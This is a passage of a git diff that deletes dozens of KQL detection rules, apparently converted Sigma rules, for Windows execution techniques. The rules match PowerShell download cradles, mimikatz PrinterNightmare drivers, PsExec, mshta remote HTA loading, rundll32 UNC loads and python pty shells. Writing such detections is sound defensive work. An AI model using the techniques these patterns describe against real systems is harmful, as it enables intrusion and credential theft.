ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " \ No newline at end of file diff --git a/Execution/PowerShell_as_a_Service_in_Registry.kql b/Execution/PowerShell_as_a_Service_in_Registry.kql deleted file mode 100644 index db6f8eca..00000000 --- a/Execution/PowerShell_as_a_Service_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova -// Date: 2020/10/06 -// Level: high -// Description: Detects that a powershell code is written to the registry as a service. -// Tags: attack.execution, attack.t1569.002 -DeviceRegistryEvents -| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/Execution/Powershell_Inline_Execution_From_A_File.kql b/Execution/Powershell_Inline_Execution_From_A_File.kql deleted file mode 100644 index b0993719..00000000 --- a/Execution/Powershell_Inline_Execution_From_A_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/25 -// Level: medium -// Description: Detects inline execution of PowerShell code from a file -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ") \ No newline at end of file diff --git a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql b/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql deleted file mode 100644 index 7dffb2f5..00000000 --- a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis, Florian Roth -// Date: 2021/07/04 -// Level: critical -// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 -// Tags: attack.execution, attack.t1204, cve.2021.1675, cve.2021.34527 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql deleted file mode 100644 index 864ecfca..00000000 --- a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 2d36359f..00000000 --- a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: medium -// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create"))) \ No newline at end of file diff --git a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql b/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql deleted file mode 100644 index ef5df7d2..00000000 --- a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team -// Date: 2020/10/12 -// Level: high -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file diff --git a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql b/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql deleted file mode 100644 index c1db5f78..00000000 --- a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) -// Tags: attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/Execution/PsExec_Service_Execution.kql b/Execution/PsExec_Service_Execution.kql deleted file mode 100644 index 124c9951..00000000 --- a/Execution/PsExec_Service_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) -// Date: 2017/06/12 -// Level: medium -// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" \ No newline at end of file diff --git a/Execution/PsExec_Service_File_Creation.kql b/Execution/PsExec_Service_File_Creation.kql deleted file mode 100644 index 8280b56f..00000000 --- a/Execution/PsExec_Service_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2017/06/12 -// Level: low -// Description: Detects default PsExec service filename which indicates PsExec service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\PSEXESVC.exe" \ No newline at end of file diff --git a/Execution/Psexec_Execution.kql b/Execution/Psexec_Execution.kql deleted file mode 100644 index 84b896e7..00000000 --- a/Execution/Psexec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/30 -// Level: medium -// Description: Detects user accept agreement execution in psexec commandline -// Tags: attack.execution, attack.t1569, attack.t1021 -DeviceProcessEvents -| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c" \ No newline at end of file diff --git a/Execution/Python_Inline_Command_Execution.kql b/Execution/Python_Inline_Command_Execution.kql deleted file mode 100644 index 6cd4f03e..00000000 --- a/Execution/Python_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Python") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))) \ No newline at end of file diff --git a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql b/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql deleted file mode 100644 index 675fc6f5..00000000 --- a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nextron Systems -// Date: 2022/06/03 -// Level: high -// Description: Detects python spawning a pretty tty -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn") \ No newline at end of file diff --git a/Execution/Query_Usage_To_Exfil_Data.kql b/Execution/Query_Usage_To_Exfil_Data.kql deleted file mode 100644 index d4a9d73a..00000000 --- a/Execution/Query_Usage_To_Exfil_Data.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: medium -// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe" \ No newline at end of file diff --git a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql b/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql deleted file mode 100644 index 6ee0ff69..00000000 --- a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/07 -// Level: medium -// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql b/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql deleted file mode 100644 index 6b4d33b2..00000000 --- a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/15 -// Level: medium -// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql deleted file mode 100644 index e8f1f303..00000000 --- a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/07/17 -// Level: medium -// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. -// Tags: attack.defense_evasion, attack.t1574, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/Execution/RemCom_Service_File_Creation.kql b/Execution/RemCom_Service_File_Creation.kql deleted file mode 100644 index 4564d7da..00000000 --- a/Execution/RemCom_Service_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/04 -// Level: medium -// Description: Detects default RemCom service filename which indicates RemCom service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\RemComSvc.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql deleted file mode 100644 index 23d22f38..00000000 --- a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/08 -// Level: medium -// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -Use this rule to detect instances of older versions of Anydesk using the compromised certificate -This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. - -// Tags: attack.execution, attack.initial_access -DeviceProcessEvents -| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql deleted file mode 100644 index 407483d4..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the execution of a system command via the ScreenConnect RMM service. -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql deleted file mode 100644 index 868f9720..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the creation of files in a specific location by ScreenConnect RMM. -ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. - -// Tags: attack.execution, attack.t1059.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\" \ No newline at end of file diff --git a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql b/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql deleted file mode 100644 index 723a8b9d..00000000 --- a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/18 -// Level: medium -// Description: Detects a remote DLL load event via "rundll32.exe". -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql b/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql deleted file mode 100644 index 952fe894..00000000 --- a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019/09/12 -// Level: medium -// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). -// Tags: attack.execution, attack.t1059.001, attack.t1021.006 -DeviceProcessEvents -| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql deleted file mode 100644 index d0784cd7..00000000 --- a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/08 -// Level: high -// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file -// Tags: attack.defense_evasion, attack.execution, attack.t1218.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/Execution/Renamed_CURL.EXE_Execution.kql b/Execution/Renamed_CURL.EXE_Execution.kql deleted file mode 100644 index 5fedd523..00000000 --- a/Execution/Renamed_CURL.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/09/11 -// Level: medium -// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/Execution/Renamed_FTP.EXE_Execution.kql b/Execution/Renamed_FTP.EXE_Execution.kql deleted file mode 100644 index a2a27522..00000000 --- a/Execution/Renamed_FTP.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/Execution/Renamed_Jusched.EXE_Execution.kql b/Execution/Renamed_Jusched.EXE_Execution.kql deleted file mode 100644 index 059e77e2..00000000 --- a/Execution/Renamed_Jusched.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Swisscom -// Date: 2019/06/04 -// Level: high -// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group -// Tags: attack.execution, attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/Execution/Renamed_NirCmd.EXE_Execution.kql b/Execution/Renamed_NirCmd.EXE_Execution.kql deleted file mode 100644 index fe83139c..00000000 --- a/Execution/Renamed_NirCmd.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2024/03/11 -// Level: high -// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PingCastle_Binary_Execution.kql b/Execution/Renamed_PingCastle_Binary_Execution.kql deleted file mode 100644 index 98720000..00000000 --- a/Execution/Renamed_PingCastle_Binary_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024/01/11 -// Level: high -// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PsExec_Service_Execution.kql b/Execution/Renamed_PsExec_Service_Execution.kql deleted file mode 100644 index 030057ea..00000000 --- a/Execution/Renamed_PsExec_Service_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators -// Tags: attack.execution -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/Execution/Ruby_Inline_Command_Execution.kql b/Execution/Ruby_Inline_Command_Execution.kql deleted file mode 100644 index 29b2f989..00000000 --- a/Execution/Ruby_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file diff --git a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql deleted file mode 100644 index bd9b3783..00000000 --- a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community -// Date: 2020/10/17 -// Level: high -// Description: Detects PowerShell script execution via input stream redirect -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Execution/Rundll32_Execution_Without_Parameters.kql b/Execution/Rundll32_Execution_Without_Parameters.kql deleted file mode 100644 index 6fb33be4..00000000 --- a/Execution/Rundll32_Execution_Without_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz, Relativity -// Date: 2021/01/31 -// Level: high -// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/Execution/Rundll32_Internet_Connection.kql b/Execution/Rundll32_Internet_Connection.kql deleted file mode 100644 index 2acd0757..00000000 --- a/Execution/Rundll32_Internet_Connection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/11/04 -// Level: medium -// Description: Detects a rundll32 that communicates with public IP addresses -// Tags: attack.defense_evasion, attack.t1218.011, attack.execution -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe")))) \ No newline at end of file diff --git a/Execution/Rundll32_UNC_Path_Execution.kql b/Execution/Rundll32_UNC_Path_Execution.kql deleted file mode 100644 index 17761d13..00000000 --- a/Execution/Rundll32_UNC_Path_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/10 -// Level: high -// Description: Detects rundll32 execution where the DLL is located on a remote location (share) -// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011 -DeviceProcessEvents -| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql deleted file mode 100644 index 8cf3471a..00000000 --- a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Agro (@agro_sev) oscd.communitly -// Date: 2020/10/13 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe")) \ No newline at end of file diff --git a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql 